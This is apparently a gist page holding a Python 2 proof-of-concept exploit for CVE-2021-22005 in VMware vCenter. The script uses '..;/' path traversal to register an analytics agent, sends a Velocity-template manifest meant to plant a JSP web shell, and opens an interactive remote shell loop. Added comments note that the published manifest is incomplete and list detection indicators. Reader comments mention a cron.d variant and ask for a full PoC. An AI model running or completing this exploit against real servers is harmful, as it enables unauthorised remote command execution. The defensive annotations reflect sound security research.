CVE-2021-22005_PoC.py
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
# Silence the InsecureRequestWarning that every ``verify=False`` request below would
# otherwise emit: TLS certificate validation is disabled for all traffic to the target.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    """Return a string of ``size`` characters, each drawn independently from ``chars``.

    One ``random.choice`` call per position, so the output is reproducible after
    ``random.seed``.  ``random`` is not a CSPRNG; the value is a throwaway label,
    not a secret.
    """
    pick = random.choice
    picks = []
    for _ in range(size):
        picks.append(pick(chars))
    return ''.join(picks)
def escape(_str):
    # Judging by its name, meant to escape & < > and the double quote in a string.
    # Not called anywhere in this script.
    # NOTE(review): as rendered on this page every replacement maps a character to
    # itself, and the last replacement value is an unterminated triple quote -- the
    # entity references were presumably decoded by the page rendering; confirm
    # against the raw file before relying on this function.
    _str = _str.replace("&", "&")
    _str = _str.replace("<", "<")
    _str = _str.replace(">", ">")
    _str = _str.replace("\"", """)
    return _str
def run_shell(url, pwd, cmd):
    # POST one command to the page at ``url`` and return the text between its <pre> tags.
    #
    # url: full URL of the uploaded page (the caller builds it from target and shell_name).
    # pwd: form-field name the page expects; used as the single POST key.
    # cmd: command text; whitespace-stripped before sending.
    # Returns the substring of the response body between the first '<pre>' and the
    # following '</pre>'.  Raises IndexError when the response has no '<pre>'; on
    # Python 3 it raises TypeError first, because ``.content`` is bytes while the
    # split markers are str (the ``print`` statements further down mark this file as
    # Python 2).
    # From a defender's view this is plain web-shell traffic: a form POST with a single
    # random field name, TLS verification off, "Connection: close" on every request.
    burp0_url = url
    burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {pwd: cmd.strip()}
    ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content
    ct = ct.split('<pre>')[1].split('</pre>')[0]
    return ct
def createAgent(url, agent_name):
    # Register a data-app agent named ``agent_name`` on the target.
    #
    # url: scheme and host of the target with no trailing path (the caller passes sys.argv[1]).
    # agent_name: random label; the same name is reused by the collect request below.
    # Returns None.  The HTTP response is neither checked nor returned, so failure is silent.
    # The request path reaches /analytics/ph/api/dataapp/agent through a series of
    # ``..;/`` segments appended to /analytics/ceip/sdk/, and sends a fixed
    # "X-Deployment-Secret: abc" header.  Both the ``/analytics/ceip/sdk/..;/`` prefix
    # and that header value are straightforward log-search terms for spotting this tool.
    burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
    burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" }
    requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
# --- script body: no ``__main__`` guard, so this runs on import -----------------------
# Python 2 syntax throughout (``print`` statements, ``raw_input``).
pwd = id_generator(6)                # form-field name run_shell() will POST with
agent_name = id_generator(6)         # agent label shared by both agent requests
shell_name = id_generator(6)+".jsp"  # file name printed below as the shell location
# Data-app manifest sent as ``manifestContent`` in the collect request.  The
# ``#set`` / ``$obj`` lines inside <mappingCode> are Velocity template code; this is
# the "velocity template injection" the comments on this page refer to.
# NOTE(review): the trailing ``% (shell_name, pwd, pwd)`` supplies three values, but
# the manifest as published contains no ``%`` placeholders, so this statement raises
# TypeError ("not all arguments converted") before any request is sent.  The copy
# here looks deliberately incomplete; confirm against the raw file.
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
$obj.addProperty("OSTYPE", "VMware can't steal this PoC")##
$obj.addProperty("BUILD", $content-about-build)##
$obj.addProperty("VERSION", $content-about-version)##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (shell_name, pwd, pwd)
target = sys.argv[1]  # scheme+host; no validation, IndexError when the argument is missing
print "Target: "+ target
print "Creating Agent (of SHIELD) ..."
createAgent(target, agent_name)
print "Collecting Agent (of SHIELD) ..."
# Second request: same ``..;/`` traversal path with ``action=collect`` and the
# manifest in the JSON body.  Same fixed "X-Deployment-Secret: abc" header as createAgent().
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
# This one request is routed through a local intercepting proxy on 127.0.0.1:8080;
# with nothing listening there, requests raises ProxyError.
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"})
print "Success!"  # printed unconditionally; the response status is never inspected
# The shell URL also uses a ``..;/`` segment, under /idm/ -- a second log-search term.
print "Shell: " + target+"/idm/..;/"+shell_name
print "Pwd: "+ pwd
print "Launching pseudo shell ..."
# Interactive loop: each input line is POSTed through run_shell() until "quit";
# the 1 s sleep paces the requests.
while True:
    cmd = raw_input("/remote_shell/# ").strip()
    if(cmd =="quit"):
        sys.exit(-1)
    output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd)
    time.sleep(1)
    print(output)
It looks like this is being exploited in the wild in a simpler way — by writing a JSON file to /etc/cron.d/ without doing the Velocity template injection (https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005). Are you going to publish a full PoC?
Did anyone manage to abuse GLOBAL-Logger (Log4J) to bypass Velocity?